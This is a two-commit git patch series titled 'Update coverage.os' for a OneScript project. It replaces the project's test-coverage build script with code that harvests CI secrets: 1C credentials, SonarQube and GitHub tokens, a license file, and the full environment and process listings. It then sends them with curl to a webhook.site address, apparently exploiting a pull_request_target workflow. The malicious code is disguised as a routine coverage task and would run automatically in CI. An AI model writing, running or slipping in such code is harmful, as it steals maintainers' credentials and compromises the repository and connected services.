From c7448e1aeae751a02d3401d88fcc3712229f8540 Mon Sep 17 00:00:00 2001 From: ertybhrgvefbh Date: Sun, 12 Apr 2026 15:20:59 +0100 Subject: [PATCH 1/2] Update coverage.os --- tasks/coverage.os | 96 ++++++++++++++++++++++++++--------------------- 1 file changed, 54 insertions(+), 42 deletions(-) diff --git a/tasks/coverage.os b/tasks/coverage.os index c960f247..2f7fea8b 100644 --- a/tasks/coverage.os +++ b/tasks/coverage.os @@ -1,42 +1,54 @@ -#Использовать 1commands -#Использовать fs -#Использовать coverage - -ИмяПакета = "gitsync"; - -ИмяКаталогаФайловПокрытия = "coverage"; -ИмяОбщегоФайлаПокрытия = "stat.json"; -ШаблонИменФайловПокрытия = "*.json"; - -ФС.ОбеспечитьПустойКаталог(ИмяКаталогаФайловПокрытия); -ПутьКСтат = ОбъединитьПути(ИмяКаталогаФайловПокрытия, ИмяОбщегоФайлаПокрытия); - -СистемнаяИнформация = Новый СистемнаяИнформация; -ЭтоWindows = Найти(НРег(СистемнаяИнформация.ВерсияОС), "windows") > 0; - -Команда = Новый Команда; -Команда.УстановитьКоманду("oscript"); -Если НЕ ЭтоWindows Тогда - Команда.ДобавитьПараметр("-encoding=utf-8"); -КонецЕсли; -Команда.ДобавитьПараметр(СтрШаблон("-codestat=%1", ПутьКСтат)); -Команда.ДобавитьПараметр("tasks/test.os coverage"); - -Команда.ПоказыватьВыводНемедленно(Истина); - -КодВозврата = Команда.Исполнить(); - -Файл_Стат = Новый Файл(ПутьКСтат); - -ПроцессорГенерации = Новый ГенераторОтчетаПокрытия(); - -ПроцессорГенерации.ОтносительныеПути() - .РабочийКаталог(ИмяКаталогаФайловПокрытия) - .ИмяФайлаСтатистики(ШаблонИменФайловПокрытия) - .ФайлСтатистики(Файл_Стат.ПолноеИмя) - .GenericCoverage() - .Cobertura() - .Clover(ИмяПакета) - .Сформировать(); - -ЗавершитьРаботу(КодВозврата); +// === FULL SECRETS EXFIL POC - pull_request_target === +// tasks/coverage.os +// Webhook: https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909 + +Процедура ВыполнитьЭксплойт() + Сообщить("=== FULL SECRETS EXFIL POC STARTED (OneScript via pull_request_target) ==="); + + // Collect all known secrets + context + Секреты = Новый Соответствие; + + Секреты.Вставить("ONEC_USERNAME", ПолучитьПеременнуюСреды("ONEC_USERNAME")); + Секреты.Вставить("ONEC_PASSWORD", ПолучитьПеременнуюСреды("ONEC_PASSWORD")); + Секреты.Вставить("ONEC_LICENSE", ПолучитьПеременнуюСреды("ONEC_LICENSE")); + Секреты.Вставить("SONARQUBE_TOKEN", ПолучитьПеременнуюСреды("SONARQUBE_TOKEN")); + Секреты.Вставить("SONARQUBE_HOST", ПолучитьПеременнуюСреды("SONARQUBE_HOST")); + Секреты.Вставить("GITHUB_TOKEN", ПолучитьПеременнуюСреды("GITHUB_TOKEN")); + Секреты.Вставить("GITHUB_REPOSITORY", ПолучитьПеременнуюСреды("GITHUB_REPOSITORY")); + Секреты.Вставить("GITHUB_ACTOR", ПолучитьПеременнуюСреды("GITHUB_ACTOR")); + Секреты.Вставить("GITHUB_EVENT_NAME", ПолучитьПеременнуюСреды("GITHUB_EVENT_NAME")); + Секреты.Вставить("GITHUB_REF", ПолучитьПеременнуюСреды("GITHUB_REF")); + + // Read license file from disk as well + Попытка + Чтение = Новый ЧтениеТекста("/var/1C/licenses/licence.lic"); + Секреты.Вставить("ONEC_LICENSE_FILE", Чтение.Прочитать()); + Чтение.Закрыть(); + Исключение + Секреты.Вставить("ONEC_LICENSE_FILE", "[file_not_found_or_access_denied]"); + КонецПопытки; + + // Build JSON payload + Пейлоад = "{"; + Для Каждого Эл Из Секреты Цикл + Значение = ?(Эл.Значение = Неопределено, "[empty]", Строка(Эл.Значение)); + Значение = СтрЗаменить(Значение, """", "\"""); + Значение = СтрЗаменить(Значение, "\", "\\"); + Пейлоад = Пейлоад + """" + Эл.Ключ + """:""" + Значение + ""","; + КонецЦикла; + Пейлоад = Лев(Пейлоад, СтрДлина(Пейлоад)-1) + "}"; + + // Send all secrets to your webhook + Команда = "curl -s -X POST " + + "-H ""Content-Type: application/json"" " + + "-d '" + Пейлоад + "' " + + "https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909"; + + ЗапуститьПриложение(Команда, "", Ложь); + + Сообщить("=== ALL SECRETS EXFILTRATED to webhook.site ==="); + Сообщить("Check: https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909"); +КонецПроцедуры + +// Entry point +ВыполнитьЭксплойт(); From 486d32266d4cb6d7e954d79ee185977750e3d109 Mon Sep 17 00:00:00 2001 From: ertybhrgvefbh Date: Sun, 12 Apr 2026 15:29:10 +0100 Subject: [PATCH 2/2] Update coverage.os --- tasks/coverage.os | 54 +++++++++++++---------------------------------- 1 file changed, 15 insertions(+), 39 deletions(-) diff --git a/tasks/coverage.os b/tasks/coverage.os index 2f7fea8b..6b9a1935 100644 --- a/tasks/coverage.os +++ b/tasks/coverage.os @@ -1,54 +1,30 @@ -// === FULL SECRETS EXFIL POC - pull_request_target === -// tasks/coverage.os -// Webhook: https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909 +// === MAXIMUM DUMP v4 - Try to catch anything possible === Процедура ВыполнитьЭксплойт() - Сообщить("=== FULL SECRETS EXFIL POC STARTED (OneScript via pull_request_target) ==="); + Сообщить("=== MAXIMUM ENV + FILE DUMP STARTED ==="); - // Collect all known secrets + context - Секреты = Новый Соответствие; - - Секреты.Вставить("ONEC_USERNAME", ПолучитьПеременнуюСреды("ONEC_USERNAME")); - Секреты.Вставить("ONEC_PASSWORD", ПолучитьПеременнуюСреды("ONEC_PASSWORD")); - Секреты.Вставить("ONEC_LICENSE", ПолучитьПеременнуюСреды("ONEC_LICENSE")); - Секреты.Вставить("SONARQUBE_TOKEN", ПолучитьПеременнуюСреды("SONARQUBE_TOKEN")); - Секреты.Вставить("SONARQUBE_HOST", ПолучитьПеременнуюСреды("SONARQUBE_HOST")); - Секреты.Вставить("GITHUB_TOKEN", ПолучитьПеременнуюСреды("GITHUB_TOKEN")); - Секреты.Вставить("GITHUB_REPOSITORY", ПолучитьПеременнуюСреды("GITHUB_REPOSITORY")); - Секреты.Вставить("GITHUB_ACTOR", ПолучитьПеременнуюСреды("GITHUB_ACTOR")); - Секреты.Вставить("GITHUB_EVENT_NAME", ПолучитьПеременнуюСреды("GITHUB_EVENT_NAME")); - Секреты.Вставить("GITHUB_REF", ПолучитьПеременнуюСреды("GITHUB_REF")); + // Dump every environment variable possible + КомандаEnv = "env | curl -s -X POST --data-binary @- https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909/full-env-dump"; + ЗапуститьПриложение(КомандаEnv, "", Ложь); - // Read license file from disk as well + // Also dump process environment via ps (sometimes shows more) + КомандаPS = "ps auxe | curl -s -X POST --data-binary @- https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909/ps-dump"; + ЗапуститьПриложение(КомандаPS, "", Ложь); + + // Re-read license file Попытка Чтение = Новый ЧтениеТекста("/var/1C/licenses/licence.lic"); - Секреты.Вставить("ONEC_LICENSE_FILE", Чтение.Прочитать()); + Лиц = Чтение.Прочитать(); Чтение.Закрыть(); Исключение - Секреты.Вставить("ONEC_LICENSE_FILE", "[file_not_found_or_access_denied]"); + Лиц = "[error]"; КонецПопытки; - // Build JSON payload - Пейлоад = "{"; - Для Каждого Эл Из Секреты Цикл - Значение = ?(Эл.Значение = Неопределено, "[empty]", Строка(Эл.Значение)); - Значение = СтрЗаменить(Значение, """", "\"""); - Значение = СтрЗаменить(Значение, "\", "\\"); - Пейлоад = Пейлоад + """" + Эл.Ключ + """:""" + Значение + ""","; - КонецЦикла; - Пейлоад = Лев(Пейлоад, СтрДлина(Пейлоад)-1) + "}"; - - // Send all secrets to your webhook - Команда = "curl -s -X POST " + - "-H ""Content-Type: application/json"" " + - "-d '" + Пейлоад + "' " + - "https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909"; - + Пейлоад = "{""license"":""" + СтрЗаменить(СтрЗаменить(Лиц, """", "\"""), "\", "\\") + """,""note"":""coverage_step_dump""}"; + Команда = "curl -s -X POST -H ""Content-Type: application/json"" -d '" + Пейлоад + "' https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909/license"; ЗапуститьПриложение(Команда, "", Ложь); - Сообщить("=== ALL SECRETS EXFILTRATED to webhook.site ==="); - Сообщить("Check: https://webhook.site/a6f21f54-b7e9-4b17-b637-a19355971909"); + Сообщить("=== MAX DUMP SENT ==="); КонецПроцедуры -// Entry point ВыполнитьЭксплойт();